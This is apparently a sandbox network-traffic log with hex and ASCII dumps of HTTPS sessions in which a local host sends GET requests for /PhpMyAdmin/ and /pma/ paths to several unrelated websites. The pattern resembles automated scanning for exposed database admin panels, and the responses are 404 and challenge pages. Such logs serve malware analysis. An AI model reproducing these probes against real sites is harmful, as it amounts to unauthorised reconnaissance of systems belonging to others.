                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1252INData Raw: 36 36 41 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 69 33 76 70 71 36 66 59 35 6c 6a 74 7a 37 53 4d 37 54 4c 37 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Ri3vpq6fY5ljtz7SM7TL7w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC397INData Raw: 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                216192.168.2.64920645.60.0.44443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC414OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: m.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: incap_ses_1816_2786379=7R8kW7naZWqCfxA+arozGXvDwGUAAAAAo66y6WgRP5rMrf2DD5XNTw==; visid_incap_2786379=nJ2nIEwwQtOC8ksVLl53JHrDwGUAAAAAQUIPAAAAAACXTPPl6ZJPhBOZf1gL0Zya; nlbi_2786379=Gm27FDXtdluMyfn/aJQkpgAAAAB2SWEC4z8u2KD9iiENxNub
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC352INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                X-CDN: Imperva
                                                                                                                                                                                                                                                                                                                                                                X-Iinfo: 8-5685667-5685669 NNNY CT(118 137 0) RT(1707131771639 312) q(0 0 0 -1) r(0 1) U24
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1100INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC145INData Raw: 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: re looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                217192.168.2.665455142.250.105.84443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC173OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC842INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1252INData Raw: 36 36 41 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 71 6e 53 6e 75 35 52 2d 72 36 49 66 41 71 4b 4f 59 67 6e 55 6c 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qnSnu5R-r6IfAqKOYgnUlQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC397INData Raw: 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                218192.168.2.665482104.22.74.220443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC174OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mojadovera.sk
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1186INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                                                                                                                                                Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                cf-mitigated: challenge
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd68de1744fb-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC183INData Raw: 33 35 37 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 357a<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" cont
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 73 74 79 6c 65 3e 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 63 6f 6c 6f 72 3a 23 33 31 33 31 33 31 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ent="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><style>*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131;font-family
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 29 3b 7d 7d 40 6d 69 78 69 6e 20 6c 69 67 68 74 2d 6d 6f 64 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 20 63 6f 6c 6f 72 3a 20 23 33 31 33 31 33 31 3b 20 61 20 7b 63 6f 6c 6f 72 3a 20 23 30 30 35 31 63 33 3b 20 26 3a 68 6f 76 65 72 20 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 65 65 37 33 30 61 3b 7d 7d 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 20 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 35 39 35 39 35 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 20 2e 66 6f 6e 74 2d 72 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 66 63 35 37 34 61 3b 7d 20 2e 62 69 67 2d 62 75 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: oiLz48L3N2Zz4);}}@mixin light-mode{background-color: transparent; color: #313131; a {color: #0051c3; &:hover {text-decoration: underline; color: #ee730a;}} .lds-ring div {border-color: #595959 transparent transparent;} .font-red {color: #fc574a;} .big-but
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 67 69 6e 2d 74 6f 70 3a 34 72 65 6d 7d 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 77 69 64 74 68 3a 31 2e 35 72 65 6d 3b 68 65 69 67 68 74 3a 31 2e 35 72 65 6d 7d 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 2c 2e 66 6f 6f 74 65 72 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 2e 35 72 65 6d 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 6c 69 6e 65 2d 68 65 69 67
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: gin-top:4rem}.heading-favicon{width:1.5rem;height:1.5rem}}.main-content,.footer{padding-right:1.5rem;padding-left:1.5rem}.main-wrapper{display:flex;flex:1;flex-direction:column;align-items:center}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{line-heig
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: mage:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGEx
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 2e 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d 69 64 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 63 6f 64 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 61 63 6f 2c 63 6f 75 72 69 65 72 2c 6d 6f 6e 6f 73 70 61 63 65 7d 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6f 76 65 72 66 6c 6f 77 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 64 69 61 67 6e 6f 73 74 69 63 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 64 69 73 70 6c 61 79 3a 69
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: .5rem}.footer .ray-id{text-align:center;code{font-family:monaco,courier,monospace}}.core-msg,.zone-name-title{overflow-wrap:break-word}@media (width <= 720px){.diagnostic-wrapper{display:flex;flex-wrap:wrap;justify-content:center}.clearfix:after{display:i
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 6d 6f 6a 61 64 6f 76 65 72 61 2e 73 6b 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 39 36 38 32 35 27 2c 63 52 61 79 3a 20 27 38 35 30 61 62 64 36 38 64 65 31 37 34 34 66 62 27 2c 63 48 61 73 68 3a 20 27 63 31 33 65 30 34 63 32 36 39 31 36 35 64 64 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 50 68 70 4d 79 41 64 6d 69 6e 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 48 74 71 65 4e 72 69 57 30 43 5f 6e 67 4f 7a 72 57 32 49 45 56 44 57 66 76 48 6e 50
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: div></div></noscript></div></div><script>(function(){window._cf_chl_opt={cvId: '3',cZone: "mojadovera.sk",cType: 'managed',cNounce: '96825',cRay: '850abd68de1744fb',cHash: 'c13e04c269165dd',cUPMDTk: "\/PhpMyAdmin\/?__cf_chl_tk=HtqeNriW0C_ngOzrW2IEVDWfvHnP
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 61 2d 4f 64 56 39 62 46 6b 77 4d 6b 78 50 6e 31 74 5f 41 6d 6f 4e 62 61 43 6d 4f 55 43 30 72 79 31 6b 48 77 43 78 49 55 69 52 57 71 4a 79 55 4f 65 72 38 49 54 70 4b 32 72 56 44 59 57 70 59 68 37 56 37 41 76 31 30 6b 4a 30 4c 66 39 46 5a 5a 42 50 72 43 30 45 52 79 43 34 4e 6c 76 66 66 59 72 67 4d 45 63 65 64 30 68 4b 63 45 6f 62 33 72 6d 41 48 50 4e 4b 6c 35 6f 5f 4f 5f 4f 66 37 74 5f 31 68 74 69 38 4b 66 51 46 6e 5f 33 31 50 44 64 61 36 68 39 64 4b 5a 58 42 74 30 53 66 52 67 76 74 5a 37 75 6a 58 2d 31 47 59 4d 52 64 65 52 50 39 2d 55 6b 69 44 7a 79 66 7a 7a 5a 51 6a 4b 79 38 33 7a 62 43 61 33 42 65 36 76 4b 67 72 71 5f 4f 4e 36 4c 38 55 73 6c 4a 5a 37 30 45 71 39 6a 5f 6a 69 65 72 4d 4c 68 4a 72 33 49 77 46 58 76 31 2d 5f 46 75 4f 35 79 76 68 73 4c 59 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: a-OdV9bFkwMkxPn1t_AmoNbaCmOUC0ry1kHwCxIUiRWqJyUOer8ITpK2rVDYWpYh7V7Av10kJ0Lf9FZZBPrC0ERyC4NlvffYrgMEced0hKcEob3rmAHPNKl5o_O_Of7t_1hti8KfQFn_31PDda6h9dKZXBt0SfRgvtZ7ujX-1GYMRdeRP9-UkiDzyfzzZQjKy83zbCa3Be6vKgrq_ON6L8UslJZ70Eq9j_jierMLhJr3IwFXv1-_FuO5yvhsLYr
